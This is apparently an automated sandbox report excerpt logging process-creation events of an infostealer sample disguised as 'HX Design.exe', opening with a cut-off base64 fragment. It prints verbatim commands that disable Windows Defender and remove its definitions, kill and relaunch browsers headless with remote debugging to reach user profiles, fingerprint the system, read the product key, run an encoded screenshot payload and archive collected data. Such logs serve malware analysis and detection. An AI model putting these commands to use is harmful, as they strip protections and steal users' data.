AgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\33ajg45c\33ajg45c.cmdline"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6698.tmp" "c:\Users\user\AppData\Local\Temp\33ajg45c\CSCD665F1311EED4D7D921539AB761843.TMP"
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --restore-last-session --remote-debugging-port=1111 --remote-allow-origins=* "--user-data-dir=C:\Users\user\AppData\Local\google\chrome\User Data" --profile-directory=Default https://www.google.com
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --headless --restore-last-session --remote-debugging-port=2223 --remote-allow-origins=* "--user-data-dir=C:\Users\user\AppData\Local/Microsoft/Edge/User Data" https://www.google.com
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=2424 --field-trial-handle=1428,i,10138126548580973783,13072940522587371912,262144 --disable-features=PaintHolding /prefetch:3
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=2384 --field-trial-handle=1596,i,5917360806848576916,10320061818208395364,262144 --disable-features=PaintHolding /prefetch:8
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe a -r -hp"1" "C:\Users\user\AppData\Local\Temp\WE9Ml.zip" *"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe a -r -hp"1" "C:\Users\user\AppData\Local\Temp\WE9Ml.zip" *
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Users\user\Desktop\HX Design.exe "C:\Users\user\Desktop\HX Design.exe"Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HX Design.exe'"Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HX Design.exe'Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --restore-last-session --remote-debugging-port=1111 --remote-allow-origins=* "--user-data-dir=C:\Users\user\AppData\Local\google\chrome\User Data" --profile-directory=Default https://www.google.comJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --headless --restore-last-session --remote-debugging-port=2223 --remote-allow-origins=* "--user-data-dir=C:\Users\user\AppData\Local/Microsoft/Edge/User Data" https://www.google.comJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe a -r -hp"1" "C:\Users\user\AppData\Local\Temp\WE9Ml.zip" *"Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HX Design.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LISTJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuidJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\33ajg45c\33ajg45c.cmdline"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
